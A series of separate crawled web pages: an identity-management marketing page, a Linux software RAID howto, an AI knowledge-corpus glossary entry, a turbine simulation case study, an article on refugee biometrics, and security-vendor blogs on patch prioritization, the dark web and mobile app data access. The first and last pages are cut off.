- Outbound Federation: Allows you to provide access to external applications to the identities that you manage within your organization.
- Bring Your Own Identity: Allows users to access resources or applications across multiple organizations using a single set of credentials supplied and stored by an Identity Provider.
1Kosmos BlockID: Why Federated Identity Management Is Critical for Modern Authentication
Modern authentication is improving incrementally, but that isn’t enough. With the severity and frequency of breaches occurring daily, it’s more important than ever to bring a robust and secure authentication method that can radically change how we log in to systems, devices and user accounts.
BlockID innovates on authentication by focusing on two aspects of digital identity:
- Passwordless authentication with decentralized identities and
- Streamlined user experience
Federated identities and SSO are essential steps in the path to strong authentication, but it isn’t enough. That’s why BlockID uses secure blockchain technology to create decentralized identities that protect user identities, provide the benefits of SSO and FIM and give power and control back to the user—some of the core tenets of the rules we articulated above.
Alongside this approach to identity verification, 1Kosmos also includes several critical features:
- KYC compliance: BlockID Verify is KYC compliant to support eKYC verification that meets the demands of the financial industry.
- Strong compliance adherence: BlockID meets NIST 800 63-3 for Identity Assurance Level 2 (IAL2) and Authentication Assurance Level 2 (AAL2).
- Incorruptible Blockchain Technology: Store user data in protected blockchains with simple and secure API integration for your apps and IT infrastructure.
- Zero-trust security: BlockID is a cornerstone for a zero-trust framework, so you can ensure user authentication happens at every potential access point.
- Liveness Tests: BlockID includes liveness tests to improve verification and minimize potential fraud. With these tests, our application can prove that the user is physically present at the point of authentication.
If you’re ready to learn about BlockID and how it supports streamlined authentication, read about how you must Go Beyond Passwordless Solutions. Also, make sure you sign up for the 1Kosmos email newsletter for updates on products and events. | <urn:uuid:886d5880-032e-4682-8860-0ab891999089> | CC-MAIN-2024-38 | https://www.1kosmos.com/digital-identity-101/identity-management/federated-identity-management-fim/ | 2024-09-17T08:41:33Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651750.27/warc/CC-MAIN-20240917072424-20240917102424-00677.warc.gz | en | 0.918329 | 1,983 | 3.21875 | 3 |
Welcome to our howto on implementing Linux software RAID with no expense other than however many hard disks you wish to use, whether they be inexpensive ordinary PATA (IDE) drives, expensive SCSI drives, or newfangled serial ATA (SATA) drives.
RAID is no longer the exclusive province of expensive systems with SCSI drives and controllers. In fact it hasn’t been since the 2.0 Linux kernel, released in 1996, which was the first kernel release to support software RAID.
What RAID Is For
A RAID array provides various functions, depending on how it is configured: high speed, high reliability, or both. RAID 0, 1, and 5 are probably the most commonly used.
RAID 0, or “striping,” writes data across two or more drives. RAID 0 is very fast; data are split up in blocks and written across all the drives in the array. It will noticeably speed up everyday work, and is great for applications that generate large files, like image editing. It is not fault-tolerant — a failure on one disk means all data in the array are lost. That is no different than when a single drive fails, so if it’s speed and more capacity you want, go for it.
RAID 1, or “mirroring,” clones two disks. Your storage space is limited to the size of the smaller drive, if your two drives are not the same size. If one drive fails, the other carries on, allowing you to continue working until it is convenient to replace the disk. RAID 1 is slower than striping, because all writes are done twice.
RAID 5 combines striping with parity checks, so you get speed and data redundancy. You need a minimum of three disks. If a single disk is lost your data are still intact. Losing two disks means losing everything. Reads are very fast, while writes are a bit slower because the parity checks must be calculated.
You may use disks of different sizes in all of these, though you’ll get better performance with disks of the same capacity and geometry. Some admins like to use different brands of hard disks on the theory that different brands will have different flaws.
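To make the trade-offs concrete, here is a rough usable-capacity and fault-tolerance calculator for the three levels just described (the disk sizes are arbitrary example values):

```python
# Rough usable capacity and fault tolerance for RAID 0, 1, and 5.
# Disk sizes are arbitrary example values, in gigabytes.
disks = [250, 250, 250]

def raid0(sizes):
    # Striping: smallest member times member count; no redundancy.
    return min(sizes) * len(sizes), 0

def raid1(sizes):
    # Mirroring: capacity of the smallest disk; survives all but one.
    return min(sizes), len(sizes) - 1

def raid5(sizes):
    # Striping with parity: one disk's worth of space holds parity.
    return min(sizes) * (len(sizes) - 1), 1

for name, fn, members in (("RAID 0", raid0, disks),
                          ("RAID 1", raid1, disks[:2]),   # mirroring pair
                          ("RAID 5", raid5, disks)):
    capacity, tolerated = fn(members)
    print(f"{name}: {capacity} GB usable, tolerates {tolerated} failed disk(s)")
```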
What RAID Is Not
It is not a substitute for a good backup regimen, backup power supplies, surge protectors, and other sensible protections. Linux software RAID is not a substitute for true hardware SCSI RAID in high-demand mission-critical systems. But it is a dandy tool for workstations and low- to medium-duty servers. PATA (or IDE) drives are not hot-swappable, but you can set up an array with standby drives that automatically take over in the event of a disk failure. If you don’t want to use standby drives your downtime is limited only to the time it takes to replace the drive, because the system is usable even while the array is rebuilding itself.
Hardware RAID controllers come in a rather bewildering variety. Mainboards come with built-in IDE RAID controllers, and PCI IDE RAID controller cards can be had for as little as $25. Most of these are like horrid Winmodems, in that they require Windows drivers to work and have Windows-only management tools. I wouldn’t bother with IDE RAID controllers — Linux software RAID outperforms them in every way, and costs nothing.
A true hardware RAID controller operates independently of the host operating system. You’ll find a lot of choices for SATA and SCSI drives. SATA controllers cost from $150 to the sky’s the limit, depending on how many drives they support, how much onboard memory they have, and other refinements that take the processing load away from the system CPU.
Good SCSI controllers start around $400 and have an even higher sky. Both SATA and SCSI controllers should support hot-swapping, error handling, caching, and fast data-transfer speeds. A good-quality hardware controller is fast and reliable; but finding such a one is not so easy. Many an experienced admin has lost sleep and hair over flaky RAID hardware.
Something to keep in mind for the future – as SATA support in Linux matures, and the technology itself improves, it should be a capable SCSI replacement for all but the most demanding uses. (For more information see the excellent pages posted by the maintainer of the kernel SATA drivers, Jeff Garzik.)
Software RAID Advantages
Linux software RAID is more versatile than most hardware RAID controllers. Hardware controllers see each drive as a single member of the RAID array, and handle only one type of hard disk. Most hardware controllers are picky about the brand and size of hard disk — you can’t just slap in any old disks you want, but must carefully choose compatible disks. And it’s not always documented what these are.
Linux RAID is a separate layer from Linux block devices, so any block device can be a member of the array — a particular partition, any type of hard drive, and you can even mix and match. Endless debates rage over which offers superior performance, hardware or software RAID. The answer is “it depends.” An old slow RAID controller won’t match the performance of a modern system with a fast CPU and fast buses. The number of drives on a cable, the types of drives and cabling, the speed of the data bus — all of these affect performance in addition to the speed of the CPU and the demands placed on it.
One disadvantage is that hot-swap ability is limited and not entirely reliable.
Converting An Existing System To RAID
First of all, your power supply must be capable of powering all the drives you want to run on the system. Adding as many drives as you want is easy and inexpensive. If you’re going to purchase new hard disks, you might as well get SATA, because the cost is about the same as PATA. SATA drives are faster and use less cabling, and will soon supplant PATA drives. PCI controller cards for additional PATA and SATA disks cost around $40, and will run two disks each. The built-in IDE channels on mainboards can handle two disks each, but you should run only one disk per channel. You’ll get better performance and minimize the risk of a fault taking out both hard disks.
Next, install the raidtools2 and mdadm packages. If you want your RAID array to be bootable, you’ll need RAID support built into the kernel. Or use a loadable module and use an initrd file, which to me is more trouble than rebuilding a kernel. Tomorrow in Part 2 we’ll cover how to do all of this. You may get a head start by consulting the links in Resources.
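As a small preview of the territory Part 2 covers, once an array is assembled the kernel reports its health through /proc/mdstat. The sketch below is one illustrative way to check it from Python; the array names and format expectations are assumptions based on typical mdstat layouts:

```python
# Minimal sketch: report software RAID health from /proc/mdstat.
# Output format assumptions are based on typical mdstat layouts.
import re

def report(path="/proc/mdstat"):
    with open(path) as f:
        text = f.read()
    # Lines like "md0 : active raid5 sdc1[2] sdb1[1] sda1[0]" name each
    # array; a later "[UUU]" string marks member state, "_" = failed.
    arrays = re.findall(r"^(md\d+)\s*:\s*(\S+)", text, re.M)
    health = re.findall(r"\[([U_]+)\]", text)
    for (name, state), members in zip(arrays, health):
        down = members.count("_")
        verdict = "OK" if down == 0 else f"DEGRADED ({down} member(s) down)"
        print(f"{name}: {state} [{members}] -> {verdict}")

if __name__ == "__main__":
    report()
```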
- Linux-raid mailing list
- The Software-RAID HOWTO
- Chapter 10 of the Linux Cookbook, “Patching, Customizing, and Upgrading Kernels”
Article courtesy of EnterpriseNetworkingPlanet | <urn:uuid:ec84e2fd-2490-44f9-adc6-e946a14ac0f0> | CC-MAIN-2024-38 | https://www.enterprisestorageforum.com/hardware/raid-faster-and-cheaper-with-linux/ | 2024-09-18T14:04:43Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651899.75/warc/CC-MAIN-20240918133146-20240918163146-00577.warc.gz | en | 0.926411 | 1,531 | 2.9375 | 3 |
AI systems for problem solving, including Cognitive Computing systems, require a base collection of knowledge or corpus. The corpus is a digital representation of all that is known about a particular domain, such as all the works of Shakespeare, or all of the defining characteristics of disorders that are codified in the Diagnostic and Statistical Manual of the American Psychiatric Association. This knowledge must be represented in a consistent form to allow the system to use it to draw inferences and make decisions, and to be able to update the corpus when appropriate.
The data required for corpora in some domains, such as medical diagnostics, insurance claim codes, and regulatory filings, are already available in text form from government and professional association sources. Packaging this data for use by AI/cognitive systems—with or without additional metadata—is a natural extension to the conventional content publishing model and is in progress for several domains.
Common knowledge—the data that helps us interpret natural language in context—has utility across industries and is generally more difficult to codify. The Cyc knowledge base, which contains over 630,000 concepts with 38,000 types of relationships, has been in development for decades and is now commercially available. Open source projects like WordNet, which catalogs words, synsets, and senses in English, can give application developers a jumpstart on building robust solutions with natural language capabilities.
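As an illustration of how such a resource is consumed, WordNet’s synsets can be queried directly from Python through the NLTK toolkit (this assumes the WordNet corpus has already been fetched with nltk.download):

```python
# Minimal sketch: query WordNet synsets through NLTK. Assumes the corpus
# has been fetched once with: import nltk; nltk.download("wordnet")
from nltk.corpus import wordnet as wn

for synset in wn.synsets("bank")[:3]:            # first few senses of "bank"
    print(synset.name(), "->", synset.definition())
    print("  lemmas:", [lemma.name() for lemma in synset.lemmas()])
```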
Representative Vendors and Projects: Cognitive Scale, CyCorp, and WordNet. | <urn:uuid:29542c0d-bab0-45b2-908d-08eaf6b6e2ef> | CC-MAIN-2024-38 | https://aragonresearch.com/glossary-knowledge-libraries/ | 2024-09-07T18:42:33Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650898.24/warc/CC-MAIN-20240907162417-20240907192417-00677.warc.gz | en | 0.931392 | 295 | 3.03125 | 3 |
Hyperion Research has published a new case study on how General Electric engineers were able to nearly double the efficiency of turbines with the help of supercomputing simulation.
HPC plays a critical role because its computational horsepower can solve the equations used to represent key physical behaviors. Also, the large memory capacity of an HPC system is needed to store the models of the geometries and boundary conditions of the physical systems. It is also essential to create the visualization of the simulation results used by GE engineers to better understand what is happening inside the gas turbine generators.
Understanding physical behaviors in harsh environments is extremely hard, and at times, critically important. That is the situation General Electric (GE) engineers faced when designing their new heavy-duty gas turbine generator. Gaining even 1% greater efficiency could save their electric utility customers millions of dollars and improve GE’s world-wide competitiveness. The key issues involved a better understanding of the fluid dynamics and reactive flow behaviors in the turbine’s 1,500 degree Celsius combustion chambers and the interactions between the 2 to 16 individual flames in the chambers. GE Power engineers had reached the limits of theory and experiments, motivating them to apply advanced modeling and simulation.
When the engineers at the GE Power division realized that their traditional approaches to designing heavy-duty gas turbine generators were insufficient, they turned to the GE Global Research computational combustion lab. In turn, the combustion lab approached Oak Ridge National Laboratory (ORNL) and Cascade Technologies. By using the Titan supercomputer at the Oak Ridge Leadership Computing Facility (OLCF), researchers adapted and applied the CHARLES code to understanding the complex physics found inside a gas turbine. This involved creating a nearly billion-cell mesh to run simulations on 8,000 to 16,000 Titan processor cores.
With these advanced modeling and simulation capabilities, GE was able to replicate previously observed combustion instabilities. Following that validation, GE Power engineers then used the tools to design improvements in the latest generation of heavy-duty gas turbine generators to be delivered to utilities in 2017. These turbine generators, when combined with a steam cycle, provided the ability to convert an amazing 64% of the energy value of the fuel into electricity, far superior to the traditional 33% to 44%. | <urn:uuid:632bd0bf-5c91-47a2-88e4-f963b21e2e29> | CC-MAIN-2024-38 | https://insidehpc.com/white-paper/understanding-behaviors-extreme-environment-natural-gas-turbine-generators/ | 2024-09-07T18:41:07Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650898.24/warc/CC-MAIN-20240907162417-20240907192417-00677.warc.gz | en | 0.928029 | 466 | 3.140625 | 3 |
Salvation requires good logistics. The refugee camp that functions well is one built with security, sanitation and a good supply of food and drinking water in mind from the very start. Before that can happen, however, there needs to be a precise understanding of how many people need to be supported. Only then can refugee agencies, border officials and charity workers begin to reckon with the immense challenges posed by feeding and housing thousands of traumatised individuals and families displaced by flood and famine, war and pestilence. Increasingly for humanitarian aid agencies, the best method of ascertaining this number lies in data collection through biometrics.
By scanning unique biometric identifiers like fingerprints, faces or irises, officials can begin to build a numerical picture of the transit camp that avoids unnecessary duplication and create a new, official identity for individuals untethered to the government documents of the nations they have fled.
Over time, this can also allow migrants to begin accessing services within the host country while protecting them from fraud. Such has been the case in Cameroon, which hosts some 6,000 refugees from the civil war in the neighbouring Central African Republic. “In the far north, north-west and south-west regions, resources are spent on addressing insecurity, which leaves less money for basic social services,” explains Kathleen Ndongmo, a member of the Africa Digital Rights Network based in Cameroon. A campaign in August to enrol thousands of refugees into a biometric ID card system, says Ndongmo, was a straightforward way for the government and UNHCR, the UN refugee agency, to allow refugees to move “freely without fear of arrest, go to school, access health and financial services, and obtain a mobile phone subscription.”
Even so, it’s a safety net with large gaps. While refugees have the power to withhold consent to having their biometric data collected, Ndongmo has heard of reports that migrants have not been empowered to understand Cameroon’s data protection regulations. It’s all the more concerning, she adds, given the security risks inherent in retaining biometric data. “Despite the fact that advances in technologies can help humanitarian agencies scale up and deliver aid more efficiently and effectively, mass-scale collection and use of refugees’ sensitive biometric data for identification and authentication is concerning,” says Ndongmo.
That leaves it, in large part, up to the collecting agency to decide what data protection regime is best to keep refugees’ biometrics safe. It’s a position that can be abused. In 2021, news emerged that the biometric data of thousands of Rohingya refugees collected by the UNHCR was shared, inexplicably, with the government of Myanmar – the very institution they fled in the first place. For Dr Petra Molnar, a research fellow at Harvard’s Berkman Klein Centre for Internet & Society, the scenario is indicative of vast power imbalances between refugee agencies and those they are meant to care for that, in time, may lead to migrants becoming unwilling test subjects for a whole range of biometric enrolment technologies.
“I don’t know if I would go as far as to say that biometrics can never be positive,” says Molnar. “But… we’re dealing with a reality that is extremely weighted against the people who are moving.”
Informed consent in biometric data collection
Agencies like the UNHCR have collected biometric data for decades in the form of fingerprints, explains Kerrie Holloway, a senior research officer at the ODI, formerly known as the Overseas Development Institute. For years, these prints formed the ideal biometric record – “unless,” she says, “you cut your fingers off, you’re kind of stuck with it” – but recently this identifier has gradually given way to more exotic variants like voice samples (used to authenticate mobile money transfers in Somaliland), gait recognition (tested on disabled Rohingya migrants in Bangladesh), and facial recognition (used to help refugees find loved ones lost in the aid system.)
Iris scanning has proven especially popular. Such data collected from the almost 40,000 refugees housed at the UNHCR’s camp at Azraq in northern Jordan is used not only to collate the number of individuals at the facility, but also to facilitate cardless payments at ATMs outside the facility using the agency’s EyePay service. “The system,” writes UNHCR, “helps to enhance the efficiency and accountability of food assistance, while also making shopping easier and more secure for refugees”.
With each iris scan stored on a form of the Ethereum blockchain, EyePay is also designed to eliminate millions of dollars in transaction fees associated with conventional money transfer services – “money,” MIT Tech Review reported in 2018, “that could have gone to millions of meals”. In time, hoped World Food Program (WFP) executive Houman Haddad, the scheme would allow refugees to open bank accounts and build new lives for themselves without recourse to the government documents of their country of origin.
How popular the system is among refugees themselves is another question. A report co-authored by Holloway found that only ten out of the 45 Syrian refugees interviewed preferred to receive cash payments through iris scanning. Another account from Dr Margie Cheesman, a digital anthropologist who visited Azraq before the pandemic, describes older refugees regularly frustrated at EyePay’s inability to recognise the irises of older individuals with eye problems like cataracts and fearful that the scans would ruin their health. “It’s all the time for the salary and the food and every time we want to buy bread too,” one woman told Cheesman. “My eyes burn after I scan them, it’s too much.”
Low levels of informed consent for iris scanning among migrants at Azraq is also alarming, says Dima Samaro, human rights researcher and an expert in the intersection of technology, human rights and migration. According to claims by Samaro, most of the refugees at Azraq submitting to iris scans do so under the assumption that refusing will prevent them from receiving basic aid, findings echoed by Molnar and Holloway in their own investigations. Effectively, says Samaro, “it’s forcing them to provide the consent in exchange for food and other basic services”.
Elsewhere, a memo published by UNHCR in April states that refugees in Jordan have their rights explained to them and that they can object to biometric data collection. While this objection ‘does not impact [their] status with UNHCR,’ its legitimacy is assessed by senior registration staff on a ‘case by case basis.’ While the classifiers collected are not shared with third parties so as to keep individual biometrics safe from misuse, ‘basic biodata’ like names and dates of registration are accessible to other humanitarian actors (such is the case with EyePay, said the UNHCR spokesperson.) However, Die Zeit reported in 2017 that the WFP was analysing purchase data from EyePay to check if refugees had a balanced diet. As such, says Samaro, “refugees find themselves in a position where they cannot defend themselves against the surveillance of their consumption habits”.
UNHCR is also obliged to share the biometric data it gathers in Jordan with the country’s government. That would be less controversial if national data protection regulations were not so weak. “There was a draft law that circulated last year, but it’s still a draft law, so it hasn’t been approved yet,” says Samaro. Even then, she adds, it failed to define biometric data under the law, let alone delineate when, if and how it should be collected.
The situation is markedly different in Europe and North America, where concerns revolve less around the lack of secure frameworks designed to keep biometrics safe than an escalation in the use of advanced technology to fortify borders against illegal immigrants. In the US, it was reported that ICE was using facial biometrics derived from selfies to monitor migrants inside its borders. Meanwhile, a pilot funded by the EU’s Horizon research and development fund named iBorderCtrl tested its own facial analysis system at airports in Latvia, Hungary and Greece from 2016-2019, built to aid border officials in working out whether travellers were lying about their identity or their ultimate destination. A similar system, named AVATAR, has also been tested at the US-Mexico border.
“This is such a clear example of playing around with really, really high-risk, experimental tools in these extremely high-risk areas that really don’t take into account the vast impacts that these [systems] have on people’s human rights, their dignity, and on their ability to present their story in a meaningful way,” says Molnar.
Critics would later argue that such systems ‘could be used to refuse entry or detain travellers based on race or ethnicity’ (emotion recognition technology, meanwhile, has since been criticised for its accuracy). Molnar herself has previously campaigned against the increased securitisation of European borders as it relates to refugees and migrants, which has seen laws passed empowering police to seize and search their phones, snoop on social media accounts, and launch drones to monitor their movements from above. Earlier this year, the Belgian parliament also approved the creation of a biometric migrant database in the country, accessible to all EU member states.
“We really are dealing with a world that has become very sharp against people on the move,” she says. “It’s really become anti-migrant. All these different jurisdictions are criminalising movement, and they’re also, increasingly, doing it through these really problematic tools.”
Keeping biometrics safe and secure
Even so, the collection of biometric data is becoming increasingly normalised for all kinds of travellers: tourists entering the US, for example, know that their fingerprints are taken by border officials at the airport, while international adoption of biometric passports increases every year. Holloway, a US citizen, was subject to similar requirements when applying for her British visa.
“I willingly agreed to give [that data] because I wanted to move to the UK,” she says. “You could possibly say the same about people who are being displaced. [But] I wasn’t being pushed out of Alabama.”
It’s a crucial difference, say human rights activists. Driven out of their countries of origin, migrants should, in theory, be subject to the same duty of care reserved for similarly vulnerable populations. But while the biometric identifiers collected from legal travellers are often ring-fenced by reams of data protection laws – the security of which is inviolably linked to the reputation of the nation gathering that data – the frameworks governing such data collection among refugees beg to be tightened, argues Holloway.
What’s needed, says the researcher, are clear limits on what kinds of identifying data are collected from refugees in order to keep their biometrics safe from breaches or misuse. “If you're doing food distribution and you want to collect fingerprints so that you know that the person who registered originally is the one receiving the food, okay,” she says. “But do you need to link that fingerprint with gender? Do you need to link it with sexual identity? Do you need to link it with ethnicity or religion? All of these things, people can be persecuted for. The more that we can minimise collection of that kind of data, I think you minimise the overall risk of people then using that database to persecute based on that.”
This is not an unlikely scenario. Governments change all the time through elections, invasions and coups d’état, the data gathered by the previous regime suborned by the next. Such was the case in Afghanistan last year, when biometric records collected by ISAF since 2002 fell into the hands of the Taliban. A border incursion here, a data breach there, and data protection regimes designed to keep biometrics safe and secure can collapse overnight. “It doesn’t take that much effort to imagine how bad that situation could get for those people, just because they’ve had to give up that kind of information when they crossed the border,” says Holloway.
There has been an improvement in data protection standards among refugee agencies. Both the International Committee of the Red Cross and Oxfam have recently published their own guidelines on how they keep biometrics safe and secure, while the UNHCR has had its own policies in place for over a decade, notwithstanding its controversies around the informed consent of collection subjects. Even so, while those in the chain of command at refugee agencies and charities are aware of data protection frameworks, says Holloway, “the person who’s collecting the fingerprint on the ground is often not aware of the rest of the machinery”.
Critics might say that, for a system seemingly so full of risks, there have been comparatively few cases where the biometric data of refugees has been breached or used as a means to oppress minorities en masse. Molnar considers this thinking wrongheaded. While biometric data collection has its place in border control and the provision of key services to migrants, the stakes are simply too high for refugee agencies and governments to continue waiting for a serious incident to occur before tightening standards.
“At the end of the day,” says Molnar, “data collection cannot come at the expense of people’s human rights”. | <urn:uuid:06a263a4-fd67-49d2-9ae0-ec599245da37> | CC-MAIN-2024-38 | https://www.techmonitor.ai/policy/privacy-and-data-protection/biometrics-safe-data-protection | 2024-09-07T17:36:24Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650898.24/warc/CC-MAIN-20240907162417-20240907192417-00677.warc.gz | en | 0.9586 | 2,841 | 2.578125 | 3 |
There is a very simple reason that it’s so difficult to prevent zero-day attacks: By definition, zero-day attacks exploit zero-day vulnerabilities – flaws in software and hardware for which no patch has yet been released. In other words, a zero-day attack is a type of cyberattack that takes advantage of problems that have yet to be fixed.
As we explained in a recent post on the threat of zero-day attacks, zero-day vulnerabilities can include risks that developers and manufacturers have to discover, as well as vulnerabilities that have been discovered but for which developers have not yet produced a corrective patch.
Still, businesses and organizations can take steps to minimize the risk posed by unpatched vulnerabilities. In the case of zero-day vulnerabilities, the most effective line of defense is simply being diligent about general cybersecurity best practices, such as making sure to use unique passwords rather than recycling passwords across platforms. In the case of vulnerabilities for which patches have already been released, the most effective course of action is to install the patches as soon as possible.
Sounds like a straightforward solution, right? There’s just one reason that it’s not: The sheer volume of patches to be applied is far too great for most organizations. Applying these patches takes time and resources, and the rate at which vulnerabilities are discovered and publicized (along with their corresponding patches) is simply beyond the scope of what most organizations can handle as far as cybersecurity.
To stay safe both from zero-day attacks and from other types of cyberattacks, it is important to understand why it can be so difficult to keep up with necessary patches and what solutions are out there to help you identify and prioritize your most urgent cybersecurity vulnerabilities. With that in mind, this post will examine the challenge of using patches and other technologies to minimize the risk of falling victim to either a zero-day attack or a cyberattack that exploits a vulnerability for which a patch has already been released.
Why It’s So Important To Prioritize Vulnerabilities
The numbers show that the pace at which cybersecurity vulnerabilities are discovered is increasing over time. While each vulnerability is cause for concern, the good news is that patches are typically announced at the same time as the vulnerabilities they address. The problem is that organizations simply do not have the time or resources to install every patch. As a result, companies are at risk of falling victim not only to zero-day attacks, but also to attacks exploiting vulnerabilities for which they have not yet installed the necessary (and available) patches.
How widespread and alarming is this problem? In 2020, yet again, more cybersecurity vulnerabilities were discovered than the year before. Specifically, 18,353 new vulnerabilities were added to the National Vulnerability Database (NVD), including a record number of 4,381 high-severity vulnerabilities over the course of the year – an average of 12 every single day.
These unpatched vulnerabilities are one of the biggest sources of data breaches and other risks for companies and organizations. As of 2018, according to Ponemon, 60% of organizations that had suffered a data breach in the previous two years said the culprit was a known vulnerability for which they had not yet patched.
The real challenge here is the necessary patching. If this process were easier, vulnerability management would by now have been relegated to routine, largely automated security control, just like antivirus and other such measures. However, vulnerability patching is a complex process that is usually managed by teams outside of security organizations, and it is time-consuming. In fact, Ponemon has found that it takes an average of 12 days for teams to coordinate and apply a patch across all devices.
Why Effective Prioritization Is So Challenging – And How Cybersixgill Does It
There’s an open secret in the world of cybersecurity: Most of the prioritization of vulnerabilities is driven by CVSS scores. While these scores can evaluate the severity of a given vulnerability, they do not adequately factor in the question of how likely that vulnerability is to be exploited in the first place. Moreover, once a vulnerability is discovered, it typically takes between two and five days for it to be assigned a CVSS score. Not only does this system often result in outdated CVSS scores, but it can delay an organization’s response to a discovered vulnerability – even as attackers get to work trying to exploit that vulnerability.
The combination of stale CVSS scores and the wait for a score to be assigned leaves too many security teams with a limited understanding of their risk environment. Meanwhile, vulnerability overload adds to the challenge security teams face in prioritizing their remediation efforts. Consequently, approaches to cybersecurity tend to be more reactive than proactive and more tactical than strategic. In particular, it can be difficult to align organizational priorities with the threats posed by potential attackers.
To enable cybersecurity teams to prioritize patches as quickly and effectively as necessary, we at Cybersixgill have developed our Dynamic Vulnerability Exploit (DVE) Score, which predicts the probability of a CVE being exploited in the near future. The scoring system is dynamic, reflecting the likelihood that threat actors will take advantage of a given vulnerability in the next 90 days. This information then enables cybersecurity and IT teams to focus on the most pressing vulnerabilities.
The DVE Score actively incorporates attacker capability, intent, and interest in real time. And because this score takes a comprehensive and dynamic approach to evaluating vulnerabilities, companies and organizations can confidently make it a major factor they use when deciding which patches to apply and in what order.
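To make the prioritization idea concrete, here is a minimal, hypothetical sketch (not Cybersixgill's actual scoring logic or API) of how a team might rank its patch backlog once each CVE carries an exploit-probability score alongside its static severity:

```python
from dataclasses import dataclass

@dataclass
class Vulnerability:
    cve_id: str
    cvss: float          # static severity score, 0-10
    exploit_prob: float  # predicted chance of exploitation in 90 days, 0-1

def patch_order(vulns, prob_threshold=0.3):
    """Rank vulnerabilities: likely-to-be-exploited ones first, ties broken by severity."""
    urgent = [v for v in vulns if v.exploit_prob >= prob_threshold]
    return sorted(urgent, key=lambda v: (v.exploit_prob, v.cvss), reverse=True)

backlog = [
    Vulnerability("CVE-2020-0001", cvss=9.8, exploit_prob=0.05),
    Vulnerability("CVE-2020-0002", cvss=7.5, exploit_prob=0.80),
    Vulnerability("CVE-2020-0003", cvss=8.1, exploit_prob=0.45),
]
for v in patch_order(backlog):
    print(v.cve_id, v.exploit_prob, v.cvss)
# CVE-2020-0002 and CVE-2020-0003 outrank the "critical" CVE-2020-0001,
# because severity alone says nothing about attacker interest.
```

The point of the sketch is the ordering principle: a medium-severity flaw that attackers are actively discussing can be more urgent than a critical one nobody is targeting.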
By tapping into the dark web’s value as a source of cyberthreat intel, the Cybersixgill DVE Score takes into account footprints that bad actors often leave behind as they communicate about their plans in underground forums. Because the dark web is where threat actors go to communicate online when they want to stay anonymous, it is often the first place where evidence of a future cyberattack appears. And, with the world’s largest data lake of information from the dark web, Cybersixgill is uniquely capable of finding and utilizing this type of intelligence.
How does all of this help companies and organizations stay safe in light of the reality that zero-day attacks are not the only type of cyberthreat they face? It empowers them with the information they need to make well-informed decisions about which patches to implement first. Although the Cybersixgill DVE Score does not in itself eliminate the vulnerabilities these organizations face, it gives them the threat intelligence they need to set their cybersecurity priorities effectively in light of the latest online discourse.
This way, cybersecurity and IT professionals can rest assured that they have the insights they need to keep up with whichever patches are the most urgent at any given time.
How can the Cybersixgill Dynamic Vulnerability Exploit (DVE) Score help you pinpoint the most urgent patches to protect your company or organization? To see for yourself, request a demo. | <urn:uuid:d64c61c8-adfc-48b5-966c-1db7ec4f49b6> | CC-MAIN-2024-38 | https://cybersixgill.com/news/articles/what-you-need-to-know-about-preventing-zero-day-attacks | 2024-09-11T10:57:57Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651383.5/warc/CC-MAIN-20240911084051-20240911114051-00377.warc.gz | en | 0.965035 | 1,416 | 2.625 | 3 |
Is Your Info on the Dark Web?
Many people have heard or read about the “dark web”. It’s an ominous phrase that sparks fear about stolen identities and illegal activity, but what actually is the dark web? Broadly, it is the part of the internet that is not indexed by search engines and that typically requires special software, such as the Tor browser, to reach.
Google, Bing, DuckDuckGo and other search engines index the websites you’re used to using, which is what makes it easy for folks to find them on their phones and computer. However, the dark web is full of websites that you can’t reach from Google or Bing, because they are controlled by people who do not want them found. They are not always hidden for nefarious purposes. Some dark web users are hiding information from totalitarian governments, for example. However, many people who do have malicious intentions use the dark web to hide their illegal activity.
What Is the Dark Web?
The dark web is often where user data stolen from companies ends up thanks to massive data breaches that IT network security services experts failed to stop.
Data Stolen and Sold
User data found on the dark web ranges from things such as names and addresses to credit card numbers to even social security numbers in the worst cases. Data like this is often sold by hackers to criminals who use it for identity theft. While malevolent actors are trying to steal data from innocent people all the time, fortunately, IT network security services prevent the majority of attacks from succeeding.
Still, we all hear the news and we know how many times hackers have exposed sensitive data over the past few years. With many of us having our data made vulnerable due to these breaches, it is very much worth asking if our information is on the dark web.
Ways to Protect Yourself
There are ways to guard yourself against your information getting out on the dark web. There are also ways to manage or handle it even if your information is caught up in a major data breach. If you’re a company that’s storing sensitive data, make sure you have IT network security services that take a proactive approach and are constantly checking your systems for vulnerabilities that hackers might exploit.
Your cybersecurity processes should not be waiting for a breach to happen to seal up the cracks. Individuals can also invest in personal cybersecurity and credit monitoring services. Many of these services will monitor the dark web and inform you if any of your sensitive information is spotted there, allowing you to take the necessary steps to fix the problem.
If your data is found on the dark web, changing your passwords, freezing your credit cards and even cancelling accounts in the direst situations are all things you can do to prevent any serious damage from occurring.
Talk to Experts on IT Network Security Services
It’s more than reasonable to be concerned about your information being in the hands of people with less-than-benevolent intentions. The reality of the situation is that we’ve seen numerous major data breaches exposing billions of records of user data, and much of that information has unfortunately made its way to the dark web.
If you want to talk to experts about your IT network security services, contact FullScope IT today and find out what you can do to stop your sensitive information from ending up where it doesn’t belong. | <urn:uuid:0cd30143-2496-4402-ac7b-9b92417b17b5> | CC-MAIN-2024-38 | https://fullscopeit.com/2021/02/is-your-info-on-the-dark-web/ | 2024-09-12T16:00:45Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651460.54/warc/CC-MAIN-20240912142729-20240912172729-00277.warc.gz | en | 0.949838 | 672 | 2.6875 | 3 |
The App Genome Project
Lookout unveiled the App Genome Project, which is the largest mobile application dataset ever created. In an ongoing effort to map and study mobile applications, the App Genome Project was created to identify security threats in the wild and provide insight into how applications are accessing personal data, as well as other phone resources. Lookout founders John Hering and Kevin Mahaffey initiated the App Genome project to understand what mobile applications are doing and use that information to more quickly identify potential security threats.
Early findings show differences in the sensitive data that is being accessed by Android and iPhone applications, as well as a proliferation of third party code in applications across both platforms. Stats include:
- 29% of free applications on Android have the capability to access a user’s location, compared with 33% of free applications on iPhone
- Nearly twice as many free applications have the capability to access user’s contact data on iPhone (14%) as compared to Android (8%)
- 47% of free Android apps include third party code, while that number is 23% on iPhone*
* Examples of third party code includes code that enables mobile ads to be served and analytic tracking for developers.
New Security Vulnerabilities
